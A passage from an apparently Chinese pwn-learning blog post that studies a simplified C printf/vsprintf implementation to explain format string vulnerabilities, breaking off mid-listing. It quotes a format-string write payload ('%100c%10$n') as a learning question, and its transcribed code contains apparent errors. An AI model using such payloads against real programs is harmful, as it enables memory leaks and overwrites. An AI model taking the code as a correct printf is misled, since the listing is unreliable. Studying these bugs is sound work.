<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Printf源码分析————深入理解格式化字符串漏洞 格式化字符串漏洞一直是我比较头痛的东西 不管是泄露地址还是改写数据，在IDA或gdb上看到的偏移总是不准确 但最近我想到了可以对照gdb上看到的地址和终端上显示的泄露地址来寻找偏移的方法： 终端上泄露的地址偏移准确，但不清楚是哪个函数的 gdb可以明确地址背后的函数，但是偏移计算常常不准确 所以用两者结合分析，就可以获取偏移了  我刚开始学习这">
<meta property="og:type" content="article">
<meta property="og:title" content="Printf源码分析">
<meta property="og:url" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Pwn进你的心">
<meta property="og:description" content="Printf源码分析————深入理解格式化字符串漏洞 格式化字符串漏洞一直是我比较头痛的东西 不管是泄露地址还是改写数据，在IDA或gdb上看到的偏移总是不准确 但最近我想到了可以对照gdb上看到的地址和终端上显示的泄露地址来寻找偏移的方法： 终端上泄露的地址偏移准确，但不清楚是哪个函数的 gdb可以明确地址背后的函数，但是偏移计算常常不准确 所以用两者结合分析，就可以获取偏移了  我刚开始学习这">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639554313034.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639503859877.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639559618139.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639559874868.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639560186765.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639593048830-1639628397565.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639740337649.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639748995340.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639750075841.png">
<meta property="og:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639750018493.png">
<meta property="article:published_time" content="2021-12-17T18:03:06.000Z">
<meta property="article:modified_time" content="2022-01-04T14:31:15.883Z">
<meta property="article:author" content="yhellow">
<meta property="article:tag" content="stack">
<meta property="article:tag" content="fmt">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639554313034.png">

<link rel="canonical" href="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>Printf源码分析 | Pwn进你的心</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Pwn进你的心</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="yhellow">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pwn进你的心">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Printf源码分析
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-12-18 02:03:06" itemprop="dateCreated datePublished" datetime="2021-12-18T02:03:06+08:00">2021-12-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-01-04 22:31:15" itemprop="dateModified" datetime="2022-01-04T22:31:15+08:00">2022-01-04</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SourceCodeAnalysis/" itemprop="url" rel="index"><span itemprop="name">SourceCodeAnalysis</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
              <span>16k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
              <span>15 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Printf源码分析"><a href="#Printf源码分析" class="headerlink" title="Printf源码分析"></a>Printf源码分析</h2><p><strong>————深入理解格式化字符串漏洞</strong></p>
<p>格式化字符串漏洞一直是我比较头痛的东西</p>
<p>不管是泄露地址还是改写数据，在<strong>IDA</strong>或<strong>gdb</strong>上看到的偏移总是不准确</p>
<p>但最近我想到了可以对照<strong>gdb上看到的地址</strong>和<strong>终端上显示的泄露地址</strong>来寻找偏移的方法：</p>
<p>终端上泄露的地址<strong>偏移准确</strong>，但不清楚是哪个函数的</p>
<p>gdb可以<strong>明确地址背后的函数</strong>，但是偏移计算常常不准确</p>
<p>所以用两者结合分析，就可以获取偏移了</p>
<hr>
<p>我刚开始学习这个漏洞时候，依葫芦画瓢地对比 <strong>printf(buf)</strong> 和 <strong>printf(“%d”,buf)</strong> 的区别，明白了第一个参数是“控制字符串”，然后伪造“控制字符串”来达到目的，接着学到更多的利用技巧，可以解决一些较为复杂的题目了，但是埋藏在我心中的疑问一直没有解决：</p>
<p>“%p”是怎么泄露地址空间的？</p>
<p>“printf”为什么可以自定义参数的数量？</p>
<p>“%100c%10$n”是怎么识别第10个偏移的，为什么输出了100个c对程序没有影响？</p>
<p>说到底，我以前对<strong>格式化字符串漏洞</strong>的学习也只是一种<strong>模仿</strong>，把它当成<strong>黑盒</strong>，达到目的就了事</p>
<p>但不久之前我受到“《汇编语言》-王爽”中<strong>综合研究</strong>的启发，对“printf”有了新的理解</p>
<p>于是我想扒一扒“printf”的运行原理</p>
<hr>
<p><strong>源码：（32位）</strong></p>
<p>​        //64位的源码和32位相比，只有宏定义的部分不同</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;io.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;ctype.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">char</span> *va_list;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_round_size(TYPE) (((sizeof(TYPE)+sizeof(int)-1)/sizeof(int))*sizeof(int)) <span class="comment">//4的整数倍</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_start(AP,LASTARG)</span></span><br><span class="line">(AP=((<span class="keyword">char</span> *)&amp;(LASTARG)+va_round_size(LASTARG)))</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_arg(AP,TYPE) </span></span><br><span class="line">(AP+=va_round_size(TYPE),*((TYPE*)(AP-va_round_size(TYPE)))) </span><br><span class="line"><span class="comment">//得到可变参数的地址，第一次返回时得到第一个参数的地址</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_end(AP)</span></span><br><span class="line">(ap=(va_list)<span class="number">0</span>) </span><br><span class="line"><span class="comment">//将释放参数表AP</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ZEROPAD 1</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PLUS 4</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SPACE 8</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> LEFT 16</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SPECIAL 32</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> STDOUT 1</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SMALL 64</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SIGN  2</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">getFieldWidth</span><span class="params">(<span class="keyword">char</span> **str)</span></span>;</span><br><span class="line"><span class="keyword">static</span> <span class="keyword">char</span> printbuf[<span class="number">1024</span>];</span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">char</span> *<span class="title">number</span><span class="params">(<span class="keyword">char</span> *str,<span class="keyword">int</span> num,<span class="keyword">int</span> base,<span class="keyword">int</span> size,<span class="keyword">int</span> precision,<span class="keyword">int</span> type)</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">vsprintf</span><span class="params">(<span class="keyword">char</span> *buf,<span class="keyword">const</span> <span class="keyword">char</span> *fmt,va_list args)</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">println</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *fmt,...)</span></span>;</span><br><span class="line"><span class="keyword">int</span> __res=<span class="number">0</span>;</span><br><span class="line"><span class="comment">//进制之间的相应转换</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> do_div(n,base)  (\</span></span><br><span class="line"><span class="meta">	__res=((unsigned long)n)%(unsigned)base,\</span></span><br><span class="line"><span class="meta">    n=((unsigned long)n)/(unsigned)base,\</span></span><br><span class="line"><span class="meta">    __res\</span></span><br><span class="line"><span class="meta">)</span></span><br><span class="line"><span class="comment">/*测试printf函数*/</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> tmp=<span class="number">10</span>;</span><br><span class="line">    println(<span class="string">&quot;%p\n&quot;</span>,tmp);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">    获取显示宽度</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">getFieldWidth</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> **str)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> len=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span>(<span class="built_in">isdigit</span>(**str))</span><br><span class="line">    len=len*<span class="number">10</span>+*((*str)++)-<span class="string">&#x27;0&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> len ;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">    以特定的进制格式化输出字符</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">char</span> *<span class="title">number</span><span class="params">(<span class="keyword">char</span> *str,<span class="keyword">int</span> num,<span class="keyword">int</span> base,<span class="keyword">int</span> size,<span class="keyword">int</span> precision,<span class="keyword">int</span> type)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> c,sign,tmp[<span class="number">36</span>];</span><br><span class="line">    <span class="keyword">const</span> <span class="keyword">char</span> *digits=<span class="string">&quot;0123456789ABCDEFGHIGKLMNOPQRSTUVWXYZ&quot;</span>;</span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    <span class="keyword">if</span>(type&amp;SMALL) digits=<span class="string">&quot;0123456789abcdefghijklmnopqrstuvwxyz&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(type&amp;LEFT) type&amp;=~ZEROPAD;</span><br><span class="line">    <span class="keyword">if</span>(base&lt;<span class="number">2</span>||base&gt;<span class="number">36</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    c=(type&amp;ZEROPAD)?<span class="string">&#x27;0&#x27;</span>:<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span>(type&amp;SIGN&amp;&amp;num&lt;<span class="number">0</span>)&#123;</span><br><span class="line">         sign=<span class="string">&#x27;-&#x27;</span>;</span><br><span class="line">         num=-num;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">         sign=(type&amp;PLUS)?<span class="string">&#x27;+&#x27;</span>:((type&amp;SPACE)?<span class="string">&#x27; &#x27;</span>:<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span>(sign)</span><br><span class="line">         size--;</span><br><span class="line">    <span class="keyword">if</span>(type&amp;SPECIAL)</span><br><span class="line">         <span class="keyword">if</span>(type==<span class="number">16</span>)</span><br><span class="line">             size-=<span class="number">2</span>;</span><br><span class="line">         <span class="keyword">else</span> <span class="keyword">if</span>(base==<span class="number">8</span>)</span><br><span class="line">             size--;</span><br><span class="line">    i=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span>(num==<span class="number">0</span>)</span><br><span class="line">        tmp[i++]=<span class="string">&#x27;0&#x27;</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">while</span>(num!=<span class="number">0</span>)</span><br><span class="line">            tmp[i++]=digits[do_div(num,base)];</span><br><span class="line">    <span class="keyword">if</span>(i&gt;precision)</span><br><span class="line">        precision=i;</span><br><span class="line">    size=-precision;</span><br><span class="line">    <span class="keyword">if</span>(!(type&amp;(ZEROPAD+LEFT)))</span><br><span class="line">        <span class="keyword">while</span>(size--&gt;<span class="number">0</span>)</span><br><span class="line">            *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span>(sign)</span><br><span class="line">        *str++=sign;</span><br><span class="line">    <span class="keyword">if</span>(type&amp;SPECIAL)</span><br><span class="line">        <span class="keyword">if</span>(base==<span class="number">8</span>)</span><br><span class="line">            *str++=<span class="string">&#x27;0&#x27;</span>;</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(base==<span class="number">16</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            *str++=<span class="string">&#x27;o&#x27;</span>;</span><br><span class="line">            *str++=digits[<span class="number">33</span>];</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(!(type&amp;LEFT))</span><br><span class="line">        <span class="keyword">while</span>(size--&gt;<span class="number">0</span>)</span><br><span class="line">            *str++=c;</span><br><span class="line">    <span class="keyword">while</span>(i&lt;precision--)</span><br><span class="line">        *str++=<span class="string">&#x27;0&#x27;</span>;</span><br><span class="line">    <span class="keyword">while</span>(i--&gt;<span class="number">0</span>)</span><br><span class="line">        *str++=tmp[i];</span><br><span class="line">    <span class="keyword">while</span>(size--&gt;<span class="number">0</span>)</span><br><span class="line">        *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> str;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">    打印输出函数</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">vsprintf</span><span class="params">(<span class="keyword">char</span> *buf,<span class="keyword">const</span> <span class="keyword">char</span> *fmt,va_list args)</span></span></span><br><span class="line"><span class="function"></span>&#123;<span class="comment">//printbuf(存储‘打印数据’的数组),fmt（格式化参数）,args（变参）</span></span><br><span class="line">    <span class="keyword">int</span> len,i,*ip,flags,field_width,precision,qualifier;</span><br><span class="line">    <span class="keyword">char</span> *str,*s;</span><br><span class="line">    <span class="keyword">for</span>(str=buf;*fmt;++fmt)<span class="comment">//str相当于buf</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span>(*fmt!=<span class="string">&#x27;%&#x27;</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            *str++=*fmt;<span class="comment">//没有遇到&#x27;%&#x27;前，str先获取fmt，再累加</span></span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">/*处理相关的标记*/</span></span><br><span class="line">        flags=<span class="number">0</span>;</span><br><span class="line">repeat:</span><br><span class="line">        ++fmt; <span class="comment">//跳过第一个%号</span></span><br><span class="line">        <span class="keyword">switch</span>(*fmt)</span><br><span class="line">        &#123;    </span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;-&#x27;</span>:</span><br><span class="line">                flags|=LEFT;</span><br><span class="line">                <span class="keyword">goto</span> repeat;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;+&#x27;</span>:</span><br><span class="line">                flags|=PLUS;</span><br><span class="line">                <span class="keyword">goto</span> repeat;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27; &#x27;</span>:</span><br><span class="line">                flags|=SPACE;</span><br><span class="line">                <span class="keyword">goto</span> repeat;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;#&#x27;</span>:</span><br><span class="line">                flags|=SPECIAL;</span><br><span class="line">                <span class="keyword">goto</span> repeat;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;0&#x27;</span>:</span><br><span class="line">                flags|=ZEROPAD;</span><br><span class="line">                <span class="keyword">goto</span> repeat;</span><br><span class="line">        &#125;</span><br><span class="line">        field_width=<span class="number">-1</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="built_in">isdigit</span>(*fmt))</span><br><span class="line">            field_width=getFieldWidth(&amp;fmt);<span class="comment">//获取域宽</span></span><br><span class="line">        precision=<span class="number">-1</span>;<span class="comment">//获取精度</span></span><br><span class="line">        <span class="keyword">if</span>(*fmt==<span class="string">&#x27;.&#x27;</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            ++fmt;</span><br><span class="line">            <span class="keyword">if</span>(<span class="built_in">isdigit</span>(*fmt))</span><br><span class="line">                precision=getFieldWidth(&amp;fmt);</span><br><span class="line">            <span class="keyword">if</span>(precision&lt;<span class="number">0</span>)</span><br><span class="line">                precision=<span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        qualifier=<span class="number">-1</span>;<span class="comment">//获取相应的修饰符</span></span><br><span class="line">        <span class="keyword">if</span>(*fmt==<span class="string">&#x27;H&#x27;</span>||*fmt==<span class="string">&#x27;L&#x27;</span>||*fmt==<span class="string">&#x27;l&#x27;</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            qualifier=*fmt;</span><br><span class="line">            ++fmt;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">switch</span>(*fmt)<span class="comment">//判断相应的格式串</span></span><br><span class="line">        &#123;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;c&#x27;</span>:</span><br><span class="line">            <span class="keyword">if</span>(!(flags&amp;LEFT))</span><br><span class="line">                <span class="keyword">while</span>(--field_width&gt;<span class="number">0</span>)</span><br><span class="line">                    *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">            *str++=(<span class="keyword">unsigned</span> <span class="keyword">char</span>)va_arg(args,<span class="keyword">int</span>);<span class="comment">//将参数值存入printbuf里的</span></span><br><span class="line">            <span class="keyword">while</span>(--field_width&gt;<span class="number">0</span>)</span><br><span class="line">                *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;s&#x27;</span>:</span><br><span class="line">            s=va_arg(args,<span class="keyword">char</span> *);</span><br><span class="line">            len=<span class="built_in">strlen</span>(s);</span><br><span class="line">            <span class="keyword">if</span>(precision&lt;<span 